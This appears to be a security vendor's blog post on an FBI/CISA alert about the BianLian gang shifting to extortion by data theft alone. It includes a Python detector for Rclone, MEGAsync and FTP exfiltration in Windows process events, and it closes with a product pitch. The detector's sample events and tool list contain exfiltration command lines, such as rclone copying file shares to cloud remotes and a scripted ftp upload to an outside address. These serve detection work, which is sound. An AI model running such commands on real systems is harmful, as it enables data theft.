FBI and CISA Issue Alert on BianLian Ransomware Gang Tactical Shift


May 17, 2023


The FBI and CISA have issued a joint alert regarding a confirmed shift in tactics by the BianLian ransomware gang. The report notes that BianLian, which previously ran a double-extortion model (exfiltrating sensitive data and then encrypting the targeted systems), shifted early this year to an exfiltration-focused extortion strategy that drops the encryption step altogether.

“BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development,” the alert notes.  

“The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made.”
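The alert names FTP, Rclone and Mega as the exfiltration channels. The following detector is an added example written for this article, not code from the advisory or from Halcyon: it scans constructed Windows process-creation (event 4688) records, flattened to one key=value line each, for those tools. The tool list, field layout and host names are assumptions for illustration. Because Rclone is a single executable that is trivially renamed, the check also matches on Rclone's command-line shape (`copy|sync|move <source> <remote>:<path>`) regardless of the image name.

```python
import re

# Constructed 4688 process-creation events, one per line, flattened to key=value form.
# Hosts, users and paths are made up for this example; they are not from a real incident.
SAMPLE_EVENTS = [
    'host=FS01 user=CORP\\svc_backup image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c dir D:\\Shares"',
    'host=FS01 user=CORP\\jdoe image=C:\\Users\\jdoe\\Downloads\\rclone.exe cmdline="rclone.exe copy D:\\Shares\\Finance mega:finance --transfers 16"',
    'host=WS22 user=CORP\\asmith image=C:\\Program Files\\MEGAsync\\MEGAsync.exe cmdline="MEGAsync.exe"',
    'host=FS01 user=CORP\\jdoe image=C:\\ProgramData\\svchost.exe cmdline="svchost.exe sync D:\\Shares\\HR remote:hr --config C:\\ProgramData\\r.conf"',
    'host=DC01 user=CORP\\admin image=C:\\Windows\\System32\\ftp.exe cmdline="ftp.exe -s:C:\\Windows\\Temp\\up.txt 203.0.113.10"',
    'host=WS07 user=CORP\\bkim image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe notes.txt"',
]

# Illustrative list of image names associated with the exfiltration channels named in the
# alert (FTP, Rclone, Mega). Extend it for your environment; this is an assumption, not
# an exhaustive inventory.
KNOWN_EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "ftp.exe", "winscp.exe"}

# Rclone invocations look like "<subcommand> <source> <remote>:<path>". Remote names are
# required to be at least two characters so a Windows drive letter ("D:\...") does not match.
RCLONE_SYNTAX = re.compile(r"\b(copy|sync|move|copyto|moveto)\s+\S+\s+[A-Za-z0-9_\-]{2,}:\S*")

EVENT_RE = re.compile(r'host=(\S+) user=(\S+) image=(.+?) cmdline="(.*)"')


def parse_event(line):
    """Split one flattened 4688 line into its fields; return None if it does not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def detect_exfil_tools(events):
    """Return (host, user, image_name, reasons) for every event that looks like exfil tooling."""
    findings = []
    for line in events:
        ev = parse_event(line)
        if ev is None:
            continue
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        reasons = []
        if image_name in KNOWN_EXFIL_TOOLS:
            reasons.append(f"known exfiltration tool: {image_name}")
        # A renamed rclone.exe still has to be driven with rclone's argument syntax.
        if image_name != "rclone.exe" and RCLONE_SYNTAX.search(cmd):
            reasons.append("rclone-style command line under a different image name (possible renamed binary)")
        # Windows ftp.exe with -s:<file> runs scripted, unattended transfers.
        if image_name == "ftp.exe" and "-s:" in cmd:
            reasons.append("ftp.exe driven by a script file (-s:), unattended transfer")
        if reasons:
            findings.append((ev["host"], ev["user"], image_name, reasons))
    return findings


if __name__ == "__main__":
    for host, user, image, reasons in detect_exfil_tools(SAMPLE_EVENTS):
        print(f"{host} {user} {image}: " + "; ".join(reasons))
```

In the constructed sample this flags the unrenamed Rclone run, the MEGAsync client, the renamed Rclone copy hiding as `svchost.exe` outside `System32`, and the scripted `ftp.exe` upload, while ignoring the ordinary `cmd.exe` and `notepad.exe` launches. A real deployment would read the fields from the 4688 event (or Sysmon event 1) rather than this flattened form and would add the destination host or remote name to the alert.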

Takeaway: Ransomware is a financially motivated crime. The operators want the money at the lowest possible cost, and they weigh return on investment in every operation. If they can get the same payout from a simpler attack, by dropping the encryption step and the decryptor support that comes with it, they will.

BianLian first emerged in the wild in the summer of 2022 and successfully attacked several high-profile organizations before a free decryption tool was released (Avast published one in January 2023) to help victims recover files encrypted by the group's ransomware.

BianLian gains initial access over Remote Desktop Protocol (RDP), and RDP is also one of the most common ways ransomware operators move laterally once inside a compromised network. This is not an exploit of RDP itself: the attacker logs in with valid credentials that were stolen, purchased, or brute-forced, and then uses the interactive session to drop malware and attack kits, run scripts in fileless attacks, or abuse legitimate administrative tools in what is known as living off the land. The defensive checks follow from that: keep RDP off the internet or behind a gateway or VPN, require MFA, lock out or rate-limit accounts after repeated failures, and alert on a burst of failed logons (event 4625) followed by a successful interactive remote logon (event 4624, logon type 10) from the same source.

"Confirmation that the BianLian group has moved away from delivering ransomware payloads in favor of purely data exfiltration and extortion attacks shows how successful the double extortion strategy is for ransomware groups," Jon Miller, CEO and co-founder of Halcyon told Silicon Angle.

With data exfiltration now one of the primary tactics in today's multi-stage ransomware attacks, we should really start thinking of these as data extortion attacks that sometimes include ransomware, rather than ransomware attacks that sometimes include data exfiltration.

“It works so well that we will likely see more groups follow suit and forego the hassle of developing and managing the encryption and decryption process in favor of a less complicated attack," Miller told SC Magazine.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more.